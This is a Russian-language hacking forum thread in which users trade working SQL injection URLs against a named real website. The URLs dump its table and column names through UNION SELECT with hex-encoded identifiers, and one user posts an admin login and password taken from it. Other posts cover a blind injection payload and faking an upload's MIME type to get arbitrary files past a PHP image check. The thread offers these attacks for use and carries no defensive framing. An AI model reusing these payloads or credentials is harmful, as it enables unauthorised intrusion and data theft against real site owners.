Ваши вопросы по уязвимостям.

Что можно сделать в таком случае?

 

При INTO OUTFILE надо использовать полный путь.

 

Подскажите как сделать чтобы отобразились названия сразу всех таблиц?

Делаю так: http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12+from+information_schema.tables+LIMIT+1,1+--+

Но как-то не найс через лимит по одной смотреть.

 

Как это сделать?

 

SIPT/Toolza

 

ну эт для вывода имена колонок, а я не могу вывести то что на этих колонках, тоесть тот пасс с колонки Password
так в принцыпе должно было выводит нужное инфо

 

так можеш выводит имена всех таблиц за раз

http://www.f1-world.ru/news/news.php3?idnews=-1003090020.0%20UNION%20ALL%20SELECT%201,(select%20concat(0x3078,Hex(cast(group_concat(table_name)%20as%20char)))%20FROM%20information_schema.tables%20Where%20table_schema=0x6631776F726C64),3,4,5,6,7,8,9,10,11,12--

а так для вывода всех колонок с таблицы users за 1 запрос

http://www.f1-world.ru/news/news.php3?idnews=-1003090020.0%20UNION%20ALL%20SELECT%201,(select%20concat(0x3078,Hex(cast(group_concat(column_name)%20as%20char)))%20FROM%20information_schema.columns%20Where%20table_schema=0x6631776F726C64%20AND%20table_name=0x7573657273),3,4,5,6,7,8,9,10,11,12--

 

а кстати вот и админ adminn:mikahakka

 

Есть слепая инъекция
SQL запрос:

Code:

SELECT o.id_object FROM attributes a   LEFT JOIN pro_ado_objects o ON a.id=o.id_attr  WHERE a.control_type IN ('text', 'textarea') AND o.value LIKE '%%' [COLOR=DarkOrange]+and+ascii(substring((SELECT login from user),1,1))>1#A%[/COLOR]' GROUP BY o.id_object

Выдает ошибку Subquery returns more than 1 row

Есть какие то ещё варианты получить данные из таблицы?
Вывод ошибок отключен!

 

А что мда? Ошибка такая. Но вывод ошибок отключен.

 

Ссылку дай и не тупи))) Subquery returns more than 1 row - это и есть вывод ошибки

 

если ссылку не в студию что тут гадать бум чтол что там

 

Ошибка появляется когда через MySQL-Front этот запрос делаю, а в скрипте то тупо белый экран и все

 

Имеется такой код:

PHP:

$filetype = $_FILES['imagen']['type'];
$name   = $_FILES['imagen']['name'];
$extension      = get_extension($name);
$imagen = $id.".".$extension;

if (!((strpos($filetype, "gif") || strpos($filetype, "jpeg") || strpos($filetype, "bmp"))))
{ 
    $message = "Error";
}

Получается, проверяется только тип, передаваемый браузером. Т.е. можно сформировать фейковый пакет с типом image/gif, а заливать любой файл, так?

 

можно, только там дописывается расширение gif, jpg или bmp. Только прозреваю, что двойное расширение и нульбайт не пройдет, ибо $id наверняка задается как цифра (будет файл вида 32.gif или 45.jpg, 65.bmp).


Это случайно не голландский сайт?

 

И снова я
Вот все же не могу разобраться. Вот что ввожу:

Code:

http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,COLUMN_NAME,3,4,5,6,7,8,9%20,10,11,12+from+information_schema.columns+where+table_name=%27COLUMN_PRIVILEGES%27+LIMIT+1,1+--+

По идее должны выводится столбцы таблицы COLUMN_PRIVILEGES. Но у меня просто ошибка Что не так делаю?

 

Хексить религия не позваляет?

 

Код еще раз глянь, расширение берется то, которое пришло: $imagen = $id.".".$extension; //imagename

Ну да, это я еще с начала попробовал.

Лол, нет.

 

Ну с этим понятно, но почему при таком вводе опять ошибка?

Или как нужно "хексить" ?

 

Мдаа, а ты задумывался над тем, что ты написал?)

Code:

http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=0x7573657273+limit+1,1+--+